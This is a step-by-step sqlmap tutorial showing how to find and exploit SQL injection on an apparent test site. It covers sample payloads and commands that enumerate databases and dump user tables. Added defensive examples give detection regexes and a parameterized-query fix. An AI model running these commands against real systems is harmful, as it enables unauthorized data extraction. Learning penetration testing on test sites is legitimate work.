
SQLmap in Depth Tutorial

Today we will work with the most popular SQL injection scanning tool and go in depth with an advanced sqlmap guide.

What is SQLmap?

SQLmap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL Injection flaws and taking over database servers.

sqlmap is a modular framework written in Python. It can detect most SQL injection flaws across different platforms. The following databases are supported: MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB.

After successful exploitation, it can enumerate databases and tables and also dump their contents.

The basic flow of sqlmap is as follows:

  • Enumerate database information such as name, version and other details.
  • Select a particular database to enumerate its tables.
  • Select tables and enumerate their columns.
  • Select columns and enumerate rows to extract data.
  • Further exploitation if required.

Check whether sqlmap is installed

In this article, we're going to attack a test website and I'll guide you through it.

Let's say we're going to attack this vulnerable site. You can get information about the switches available in sqlmap using the following command.

sqlmap --help

Command Output

[screenshot: sqlmap-help]

If sqlmap is not installed you get this message, so please install sqlmap on your machine:

Command 'sqlmap' not found, but can be installed with:

sudo apt install sqlmap

Step 1 - Identifying the vulnerable url

First of all we need to check whether the site is vulnerable to SQL injection or not.

sqlmap -u http://testphp.vulnweb.com/ --crawl 2 --batch

  • --crawl : how deep you want to crawl a site, for example --crawl 3
	Depth 1: http://www.example.com/news
	Depth 2: http://www.example.com/news/newest/
	Depth 3: http://www.example.com/news/newest/terror/
	Depth 4: http://www.example.com/news/newest/terror/country/
  • --batch : non-interactive mode; usually sqlmap will ask you questions, and this accepts the default answers

Command Output

[screenshot: sqlmap-identify-vulnerable-url]

Step 1.1 - Identifying the vulnerable url with the --technique option

sqlmap is able to detect and exploit five different SQL injection types:

  • Boolean-based blind (B) : sqlmap replaces or appends to the affected parameter in the HTTP request a syntactically valid SQL statement string containing a SELECT sub-statement, or any other SQL statement whose output the user wants to retrieve.
Example
http://testphp.vulnweb.com/artists.php?artist=1 or 1=1
  • Time-based blind (T) : sqlmap replaces or appends to the affected parameter in the HTTP request a syntactically valid SQL statement string containing a query that puts the back-end DBMS on hold for a certain number of seconds before returning.
Example
http://testphp.vulnweb.com/artists.php?artist=1 or sleep(5)
  • UNION query-based (U) : sqlmap appends to the affected parameter a syntactically valid SQL statement starting with a UNION ALL SELECT.
Example
http://testphp.vulnweb.com/artists.php?artist=1 UNION ALL SELECT
  • Stacked queries (S) : sqlmap tests whether the web application supports stacked queries and, if it does, appends to the affected parameter in the HTTP request a semicolon (;) followed by the SQL statement to be executed.
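As a defender-side complement to the four techniques above, here is an added example (not from the original tutorial or from the sqlmap project) that scans web-server access-log lines for the payload shape each technique sends and for sqlmap's default User-Agent string. The log lines are constructed for the demo; the regexes and the per-IP roll-up are my own assumptions about what a first-pass detection would look for.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (Apache/nginx "combined" format), not captured from the tutorial's target.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /listproducts.php?cat=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:37 +0000] "GET /artists.php?artist=1%20or%201%3D1 HTTP/1.1" 200 9031 "-" "sqlmap/1.7"
203.0.113.7 - - [10/Oct/2023:13:55:38 +0000] "GET /artists.php?artist=1%20or%20sleep(5) HTTP/1.1" 200 5120 "-" "sqlmap/1.7"
203.0.113.7 - - [10/Oct/2023:13:55:39 +0000] "GET /artists.php?artist=1%20UNION%20ALL%20SELECT%20NULL,NULL HTTP/1.1" 200 7200 "-" "sqlmap/1.7"
198.51.100.4 - - [10/Oct/2023:13:56:01 +0000] "GET /search.php?q=select+union HTTP/1.1" 200 800 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) \S+ "([^"]*)" "([^"]*)"'
)

# One pattern per sqlmap technique letter described in the tutorial.
SIGNATURES = {
    "B": re.compile(r"\b(or|and)\s+\d+\s*=\s*\d+", re.I),                          # boolean-based: "or 1=1"
    "T": re.compile(r"\b(sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b", re.I),  # time-based delay
    "U": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),                          # UNION query-based
    "S": re.compile(r";\s*(select|insert|update|delete|drop|exec)\b", re.I),        # stacked queries
}


def analyze(log_text):
    """Return one finding per request carrying an injection-shaped payload or a sqlmap User-Agent."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, _ts, _method, target, _status, _referer, ua = m.groups()
        decoded = unquote_plus(target)  # match on the decoded query string, as the DBMS would see it
        techniques = sorted(code for code, rx in SIGNATURES.items() if rx.search(decoded))
        # The default UA is a strong hint but trivially changed, so payload shape is the primary signal.
        sqlmap_ua = "sqlmap" in ua.lower()
        if techniques or sqlmap_ua:
            findings.append({"ip": ip, "target": decoded, "techniques": techniques, "sqlmap_ua": sqlmap_ua})
    return findings


def per_source(findings):
    """Count flagged requests per client IP, the usual pivot for alerting or rate-limiting."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts
```

Run `analyze(SAMPLE_LOG)` to see the three probes from 203.0.113.7 tagged B, T and U while the benign search for "select union" from the other client is left alone.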

In this article we test only the UNION query-based technique with sqlmap:

sqlmap -u http://testphp.vulnweb.com --crawl 3 --technique="U" --batch

Command Output

[screenshot: sqlmap-identify-vulnerable-url-with-union-technique]

Step 1.2 - Identifying the vulnerable url with the --threads option

If you work on a big website you can use the --threads option. The default number of threads in sqlmap is 1; you can use up to 10. It makes the work faster.

The --threads option defines the maximum number of concurrent HTTP(S) requests.

sqlmap -u http://testphp.vulnweb.com --crawl 3 --threads 5 --batch

Step 1.3 - Identifying the vulnerable url with the --risk option

Sometimes a vulnerability isn't found; then you can use the --risk option. It controls the type of payloads used by the tool. By default it uses value 1 and can be configured up to 3. Risk 3, being the maximum, includes some heavy SQL queries. The level defines the number of checks/payloads to be performed.

sqlmap -u http://testphp.vulnweb.com --crawl 3 --risk 2 --batch

Step 1.4 - Identifying the vulnerable url with the --level option

By default sqlmap will test all GET and POST parameters specified; however, in some cases you might want to test additional entry points such as HTTP headers. It is possible to specify them with specific options, but the most straightforward technique is to use the --level option.

There are 5 levels available in sqlmap (default is 1):

  • --level 1 : test all GET and POST parameters.
  • --level 2 : test the HTTP Cookie header.
  • --level 3 : test the HTTP User-Agent/Referer headers.
  • --level 5 : test the HTTP Host header.

Note: no details given for level 4.

sqlmap -u http://testphp.vulnweb.com --crawl 3 --level 1 --batch

Step 1.5 - Identifying the vulnerable url with the -v option

This option can be used to set the verbosity level of output messages. There are seven levels of verbosity. The default level is 1, in which information, warning, error and critical messages and Python tracebacks (if any occur) are displayed.

  • 0 : Show only Python tracebacks, error and critical messages.
  • 1 : Show also information and warning messages.
  • 2 : Show also debug messages.
  • 3 : Show also payloads injected.
  • 4 : Show also HTTP requests.
  • 5 : Show also HTTP responses' headers.
  • 6 : Show also HTTP responses' page content.

sqlmap -u http://testphp.vulnweb.com --crawl 3 -v 4 --batch

Command Output

[screenshot: sqlmap-identify-vulnerable-url-with-verbosity]

Step 2 - Enumerate and exploit the vulnerable url

Find the current database user

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --current-user

Command Output

[screenshot: sqlmap-enumerate-current-user]

Find the current database name

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --current-db

Command Output

[screenshot: sqlmap-enumerate-current-database]

Find the hostname of the database server

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --hostname

Command Output

[screenshot: sqlmap-enumerate-current-host]

Fetch all databases

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs

Command Output

[screenshot: sqlmap-enumerate-all-database]

Fetch all tables from a specific database

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables

Command Output

[screenshot: sqlmap-enumerate-database-tables]

Fetch all columns from a specific table

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --columns

Command Output

[screenshot: sqlmap-enumerate-table-column]

Fetch all data from a specific table

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --dump --batch

Command Output

[screenshot: sqlmap-enumerate-table-data]

Fetch all data from all available tables

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --dump-all
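To show what the enumeration above actually exploits, and how the application owner closes it, here is an added example (not code from the tutorial or from the target site, whose real schema is unknown): a `cat` lookup written with string concatenation next to the same lookup with type validation and a bound parameter, run against a constructed in-memory SQLite table. The table and column names are assumptions.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the tutorial's product listing (assumed schema, sample rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, cat INTEGER, name TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)",
                     [(1, 1, "poster"), (2, 2, "mug"), (3, 3, "shirt")])
    return conn


def list_products_vulnerable(conn, cat):
    # The ?cat= value is pasted into the SQL text, so "1 or 1=1" widens the WHERE clause
    # and a UNION payload can read other tables; this is what --dbs and --dump rely on.
    sql = "SELECT id, name FROM products WHERE cat = " + cat + " ORDER BY id"
    return conn.execute(sql).fetchall()


def list_products_fixed(conn, cat):
    # Enforce the expected type first, then bind the value as a parameter so the DBMS
    # receives it as data rather than as SQL; the payloads above then never reach the parser.
    try:
        cat_id = int(cat)
    except ValueError:
        raise ValueError("cat must be an integer id") from None
    sql = "SELECT id, name FROM products WHERE cat = ? ORDER BY id"
    return conn.execute(sql, (cat_id,)).fetchall()
```

With the same input "1 or 1=1", the concatenated version returns every row while the fixed version refuses the request before any query is sent.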

Step 3 - Save your data and create a report

sqlmap -u http://testphp.vulnweb.com --crawl 3 --output-dir="/home/kali/temp/" --batch

[screenshot: sqlmap-save-report]